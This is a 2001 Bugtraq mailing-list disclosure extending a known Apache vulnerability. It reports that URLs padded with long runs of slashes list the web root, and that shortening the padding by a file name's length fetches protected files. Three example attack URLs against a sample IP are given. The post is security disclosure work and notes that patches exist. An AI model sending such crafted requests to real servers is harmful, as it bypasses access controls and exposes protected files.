[21901] in bugtraq
Apache Artificially Long Slash Path Directory Listing Vulnerabili
daemon@ATHENA.MIT.EDU (Brian Dinello)
Thu Jul 26 18:17:28 2001
Message-ID: <9B515520AA3CD411B36900508B6636B508F8C9B2@mi8nycmail02.mi8.com>
From: Brian Dinello <brian.dinello@vigilantminds.com>
To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Thu, 26 Jul 2001 11:55:16 -0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Apache Artificially Long Slash Path Directory Listing Vulnerability
BUGTRAQ ID 2503
I'm not really sure if this is a known issue, but here goes:
Old news: As the vulnerability's description describes, any user
with a web browser can obtain directory listing of the Apache http
root directory, even if the directory contains an index.html file and
is password protected.
New news: You can access files/directories under the http root by
subtracting the number of slashes from the appended url equal to the
number of characters in the file or directory name you are attempting
to access. Example:
Standard Directory List:
http://15.16.17.18////////////////////////////////////////////////////
////////////////
Download an Arbitrary file:
http://15.16.17.18////////////////////////////////////////////////////
////thisfile.txt
Or In a Directory:
http://15.16.17.18////////////////////////////////////////////////subd
ir1/thisfile.txt
I've made no attempt to contact The Apache Group to discuss this as
it is the result of a known vulnerability and patches have already
been released to fix vulnerable systems.
Brian Dinello
Security Consultant
VigilantMinds, Inc.
brian.dinello@vigilantminds.com
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBO2A9ma1dkgK5UcWTEQIa4wCfXK2NheBMvCb67CSOXBGpGoXEkfsAoNOC
ZjyC05S8XddgUvLifLIIvx2o
=Fz1o
-----END PGP SIGNATURE-----
